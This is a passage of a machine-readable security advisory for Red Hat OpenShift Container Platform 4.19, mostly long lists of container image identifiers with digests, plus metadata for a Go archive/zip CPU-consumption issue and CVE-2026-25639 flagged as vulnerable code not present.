"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "golang: archive/zip: Excessive CPU consumption when building archive index in archive/zip"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
